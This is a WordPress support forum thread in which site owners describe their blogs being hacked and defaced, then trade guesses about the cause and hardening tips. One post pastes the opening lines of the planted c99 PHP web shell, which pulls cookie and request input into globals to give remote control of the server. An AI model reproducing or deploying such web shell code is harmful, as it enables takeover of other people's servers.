Forums

WordPress › Support » How-To and Troubleshooting

[resolved] My WordPress Hacked (18 posts)

  1. Jonski
    Member
    Posted 6 years ago #

    v2.0.3

    I got an email from my WP site (wordpress@..
    --
    Subject: Password Lost/Change
    Password Lost and Changed for user: admin
    --
    I went to the site and couldn't log in, I tried to retrieve the password but "Sorry, that user does not seem to exist in our database.", that user being Admin. I checked the database and I'm pretty sure the wp_users table was empty (I was in a bit of a panic but pretty sure)

    On the site I then noticed the lastest post had been edited to...
    --
    hax vs YOU
    hax was here, hax fucked you, please no 3war ras

    همود يهبيني؟
    --
    which seemed to sum up the situation.

    Back to the database; I now see one user, admin, email listed as upx@dynamicz.org and user registered 2006-06-09 16:07:10. I have now changed that account and regained access but I see no reason why they shouldn't be able to do whatever they did again whenever they want.

    I need to know how this happened, I have a few wordpress sites and this could happen to any at any time...

    anyone have any ideas?

  2. whooami
    Member
    Posted 6 years ago #

    there are a few more things that anyone trying to help/stop repeat occurances would need to know:

    OS (flavor and kernel version if nix based obviously), php version, mysql version, whether or not you have contacted your host, what they said, any other software installed on that domain/whatever, was it touched..

    Also, Matt/Dougal/someone has set up a special email addy for those sorts of reports:

    http://wordpress.org/about/contact/

    middle of the way down..

    security@wordpress.org

    if it were me, i would get all the above info (most of it is available on the left side of your cpanel), and send off an email.

  3. whooami
    Member
    Posted 6 years ago #

    as an aside, dynamicz.org is a real domain, for those that havent already checked, (all ONE of you) :P and while there does appear to be some "arab" influence on the site (check the forums) I couldnt locate that username (upx) anywhere -- not to say it doesnt exist

  4. Jonski
    Member
    Posted 6 years ago #

    The site hacked is something not yet live (although it is online) so I have decided to leave for a bit so you can have a look.
    php info here
    http://www.footyclub.com/info.php

    The WP site is at
    http://www.footyclub.com/football/

    I just want to find out what happened so I can stop it happening to my other WP sites that are live.

    I will send that email - cheers.

  5. whooami
    Member
    Posted 6 years ago #

    I for one, would be VERY interested in seeing your Apache logs.. unfortuntely theres no telling without a good scouring to know exactly when that was done, or is there?
    Assuming that post date of June 13 was edited.. whens the last time you actually checked that site? Has it been a month?

    IF you do archive your Apache logs, some do, some dont (its an option in CPanel) I would LOVE to take a close look at your Apache logs for June (if in fact you think thats when that happened, July, obviously (if you think thats when it happened).

    If you are OK with that, and have them archived, feel free to contact me whoo AT village-idiot DOT org. Rest assured, I wouldnt share anything I find without your prior approval.

    Good luck either way, and take care!

  6. Jonski
    Member
    Posted 6 years ago #

    It happened today, they edited an existing post.

    I have to go now but I will see if I can get the logs later and contact you. Thanks.

  7. FredAdi
    Member
    Posted 6 years ago #

    I had my wordpress blog hacked last week.... we worked out the only realistic reason was that the blog was created using fantastico - which is a cpanel plugin. If you happen to use the same username/password as your ftp during your fantastico wordpress install - it seems there is a security flaw.

  8. Jonski
    Member
    Posted 6 years ago #

    I'm back! I was away a little longer than expected. My logs are not archived! I've never looked before, if I had looked on the day they would have been there but I just presumed they would be there for more than a day. oops.

    Although I did use it once I am fairly sure I didn't use fantastico with this install.

    It is a bit worrying. There is nothing to stop it happening again.

  9. manstraw
    Member
    Posted 6 years ago #

    Can't stop if you don't know how it happened. He might have cracked into mysql. Perhaps a plugin let him in.

    I would ask that you have your account moved to another server. Perhaps that one was already compromised, or perhaps it now has a compromise left behind.

  10. 21stproject
    Member
    Posted 6 years ago #

    Your blog was hacked? That sucks.

    Just thought I'd mention this in case anyone's interested, that little bit of Arabic seems to be saying;

    Hmood Loves Me

    I'm pretty sure that's what it's saying even though the person has misspelled the words.

  11. JerryWho
    Member
    Posted 6 years ago #

    I was hacked 13 times in a row.

    they used an index.php file with the following code:

    <?php
    if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
    error_reporting(5);
    @ignore_user_abort(TRUE);
    @set_magic_quotes_runtime(0);
    $win = strtolower(substr(PHP_OS,0,3)) == "win";
    define("starttime",getmicrotime());
    if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
    $_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
    foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}

    $shver = "1.0 pre-release build #16"; //Current version
    if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
    elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
    else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
    }

    $surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.

    etc.

    the fellow even created an email and altered my cPanel email address... I suspect he came through the WordPress On Demand Backup Plugin.

    Any ideas?

  12. RyuMaou
    Member
    Posted 6 years ago #

    Why would you suspect that plugin was the culprit?

    I mean, without logs to trace anything, the attacker could have compromised the server and gotten at you via a PHP hack. I'm not disagreeing with you, but I'd be interested in how you figured it out.

  13. JerryWho
    Member
    Posted 6 years ago #

    i have 5 wordpress blogs running on my server, the only blog that was hacked was the one with the plug-in activated.

    i experimented with switching the plug-in off, and activating it on another one, and sure enough, the one with the plug-in activated was hacked.

    so, ya, i must say i found out the hard way.

  14. JerryWho
    Member
    Posted 6 years ago #

    Dear RyuMaou:

    Someone else made the same observation:

    http://wordpress.org/support/topic/85036?replies=23#post-435367

  15. RyuMaou
    Member
    Posted 6 years ago #

    Interesting....
    Do you mind sharing what version of the plugin you're using? It is the one from skippy dot net, right?

    I'm asking because I've had some problems in the past with someone hitting my site via a PHP injection attack of some kind and, while I "fixed" the problem, I never did figure out how they were doing it. (In my case, I adjusted the directory permissions on the blog directories and that shut down the attacker.)

    Thanks!

  16. JerryWho
    Member
    Posted 6 years ago #

    it's the one that came with the standard installation of wordpress 2.0.4

    which directory did you alter permission? may i ask?

  17. RyuMaou
    Member
    Posted 6 years ago #

    As I recall, most of them, but most especially the wp-content directory and everything under it. Makes it hard to edit plugins and themes live, but, at the time, it seemed a good trade off.
    In light of this, I may check versions of the backup plugin and re-enable permissions on the plugins and themes directories.

    Did you update your backup plugin? And, was it effective? I know it hasn't been long since you had the problem, but I've found that these little blighters don't have anything better to do and come back soon and often.
    Hopefully, you're problems have been resolved, though.

  18. etechsupport
    Member
    Posted 6 years ago #

    Also you should disable immediately the User registration enabled for guests to leave comments.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags